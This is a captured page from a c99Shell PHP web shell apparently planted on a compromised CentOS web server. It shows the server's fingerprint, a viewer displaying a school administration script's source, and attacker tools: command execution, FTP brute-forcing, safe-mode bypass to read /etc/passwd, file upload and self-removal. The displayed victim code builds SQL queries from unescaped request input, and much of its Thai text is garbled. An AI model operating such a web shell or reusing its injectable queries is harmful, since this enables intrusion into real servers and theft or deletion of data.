110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/admin/ drwxr-xr-x Free 40.47 GB of 127.8 GB (31.67%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/manage/admin/ drwxr-xr-x
Free 40.47 GB of 127.8 GB (31.67%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: AccessList.php (19.24 KB) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

";
		echo "

ЎГШіТ·УЎТГ Login ЎиН№
";
		echo "";
		exit();
	} 
	else {
		/**  Configuration  */
		require_once( "../configuration.php" );
		require_once( $_Config_absolute_path . "/includes/framework.php" );
	
		/**  Create Database Object  */
		$dbObj = new DBConn;
		
		/**  Config Table for This Page  */
		$myTable = "personal_tb"; 
		$myTable1 = "user_tb"; 
		$myTable1FK = "Teacher_code";
		$myTableFK = "Teacher_id";

		/**  Paging */
		$page = $_GET['page'];
		if( $page == "" ) { $page = 1; }
			
		/**  Botton Name Action */
		$action = $_REQUEST['action'];
		$id = $_REQUEST['id'];
	
		/**  ЁУ№З№ўйНБЩЕ µиН 1 Л№йТ  */
		$perpage = $_REQUEST['perpage'];
		if( $perpage == "" ) { $perpage = 20; }
		
		
		/**  Searching */
		$keyword = $_REQUEST['keyword'];
	
		
		/**  Botton Name Action */
		$action = $_REQUEST['action'];
		$id = $_REQUEST['id'];
	
		if( isset($action) && !empty($action) ) {
			switch($action) {
				case "Delete" :
					$num = count($id);
					for( $i=0; $i<$num; $i++ ) {
						//--- tech_plan_tb
						$qrySel = " SELECT *  FROM  $myTable   WHERE  Teacher_code='$id[$i]' ";
						$resultSel = $dbObj->execQuery($qrySel);
						$rsSel = $dbObj->fetchObject($resultSel);
							$Teacher_code = $rsSel->Teacher_code;
						
						$qryDel = " DELETE FROM  $myTable   WHERE  Teacher_code='$id[$i]' ";
						$resultDel = $dbObj->runQuery($qryDel);
						$dbObj->freeresult($resultDel);
						
						if( $resultSel ) {
							//--- techplan_method_tb
							$qryDel3 = " DELETE FROM   $myTable1   WHERE    Teacher_code='$id[$i]' ";
							$resultDel3 = $dbObj->runQuery($qryDel3);
							$dbObj->freeresult($resultDel3);
							
							//--- tech_spec_tb
							//$qryDel4 = " DELETE FROM  $myTable1   WHERE Teacher_code='$Teacher_code' ";
						//	$resultDel4 = $dbObj->runQuery($qryDel4);
						//	$dbObj->freeresult($resultDel4);
						} # if
						
					}
				break;
			} # switch
		} # if
		
	} # else
 ?>





јЩйґЩбЕГРєє - ўйНБЩЕјЩйгЄй§Т№·Сй§ЛБґ







  
    
    
    execQuery($query);
		$numrows = $dbObj->_numrows;
		
		/**  Paging  */
		$display = ( !isset ($_GET['page']) ) ? 1 : $_GET['page'];
		$start = ( ($display * $limit) - $limit );
		/**  Paging  */
		
		//###  Search
		if( $keyword != "" ) { 
			if( isset($_GET['OrderBy']) ) {
				$query = "SELECT * FROM personal_tb as pt 
						LEFT JOIN prefix ON pt.First_name = prefix.prefixId 
						LEFT JOIN user_tb ON pt.Teacher_code = user_tb.Teacher_code 
						LEFT JOIN permission_tb ON user_tb.Priority = permission_tb.permission 
						WHERE pt.StatusId='1' AND (pt.Teacher_name LIKE '%$keyword%' OR pt.Teacher_lastname LIKE '%$keyword%' OR user_tb.Username LIKE '%$keyword%') 
						ORDER BY $OrderBy $ASCDESC";
			} 
			elseif( !isset($_GET['OrderBy']) ) {
				$query = "SELECT * FROM personal_tb as pt 
						LEFT JOIN prefix ON pt.First_name = prefix.prefixId 
						LEFT JOIN user_tb ON pt.Teacher_code = user_tb.Teacher_code 
						LEFT JOIN permission_tb ON user_tb.Priority = permission_tb.permission 
						WHERE pt.StatusId='1' AND (pt.Teacher_name LIKE '%$keyword%' OR pt.Teacher_lastname LIKE '%$keyword%' OR user_tb.Username LIKE '%$keyword%') 
						ORDER BY $myTableFK ASC ";
			}
		}
		else {
			if( isset($_GET['OrderBy']) ) {
				$query = "SELECT * FROM personal_tb as pt 
						LEFT JOIN prefix ON pt.First_name = prefix.prefixId 
						LEFT JOIN user_tb ON pt.Teacher_code = user_tb.Teacher_code 
						LEFT JOIN permission_tb ON user_tb.Priority = permission_tb.permission 
						WHERE StatusId='1' 
						ORDER BY $OrderBy $ASCDESC";
			} 
			elseif( !isset($_GET['OrderBy']) ) {
				$query = "SELECT * FROM personal_tb as pt 
						LEFT JOIN prefix ON pt.First_name = prefix.prefixId 
						LEFT JOIN user_tb ON pt.Teacher_code = user_tb.Teacher_code 
						LEFT JOIN permission_tb ON user_tb.Priority = permission_tb.permission 
						WHERE StatusId='1' 
						ORDER BY $myTableFK ASC";
			}
		}
		
		$query .= " LIMIT $start, $limit ";
		$result = $dbObj->execQuery($query);
    ?>
    
    
      
        
      
    
    
      
      
        ўйНБЩЕаўйТГРєє / ЅиТВ§Т№
        ЁУ№З№ўйНБЩЕµиНЛ№йТ 
      
      
        
          
            
              
            
          
          
            
              
                
                  
                    Keyword: 
                      " />
                      
                    
                  
                  
                    
                  
                
              
            
          
           0 ) { ?>
          fetchObject($result) ) { 
				$bgColor = ( $bgColor == "#FFFFFF" ) ? "#F9FBFB" : "#FFFFFF";	
				
				if( $keyword != "" ) {
					$Teacher_name = eregi_replace( $keyword, "\\0", $rs->Teacher_name );
					$Teacher_lastname = eregi_replace( $keyword, "\\0", $rs->Teacher_lastname );
					$Username = eregi_replace( $keyword, "\\0", $rs->Username );
				}
				else {
					$Teacher_name = $rs->Teacher_name;
					$Teacher_lastname = $rs->Teacher_lastname;
					$Username = $rs->Username;
				}
          ?>
          
          
            ID
			
						 
				
						 
				&OrderBy=&ASCDESC=">ЄЧиН - №ТБКЎШЕ
            
						 
				
						 
				&OrderBy=&ASCDESC=">Username
			Password
            Priority
        	К¶Т№РЎТГ
аўйТгЄйГРєє
            Edit
            
          
          
            
            ". $rs->prefixName." ".$Teacher_name ."  ". $Teacher_lastname ."";?>
            
            PasswordR;?> Teacher_lastname;?> " />
            description;?>
              Teacher_lastname;?> " />
            Flag == 1) 
bool(false)


:: Command execute ::
Enter:   Select:  



:: Shadow's tricks :D  ::

  
    Useful Commands 
    
    
      
        
        
          
        
         
        
          

        Warning. Kernel may be alerted using higher levels 
    
    
  
   Kernel Info: 
      
      
	  
	  
	  
	  
    
    



:: Preddy's tricks :D  ::

  
    Php Safe-Mode Bypass (Read Files)
    


    
      
      File:  

 eg: /etc/passwd

      
      
      
           
      
      
      	
	
          

      
    
    
  
   Php Safe-Mode Bypass (List Directories):     
      

      Dir:  

 eg: /etc/


    
    




 :: Search ::  - regexp 
 :: Upload :: 
[ ok ]



:: Make Dir :: 
[ ok ] :: Make File :: 
[ ok ]

:: Go Dir ::  :: Go File :: 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0176 ]--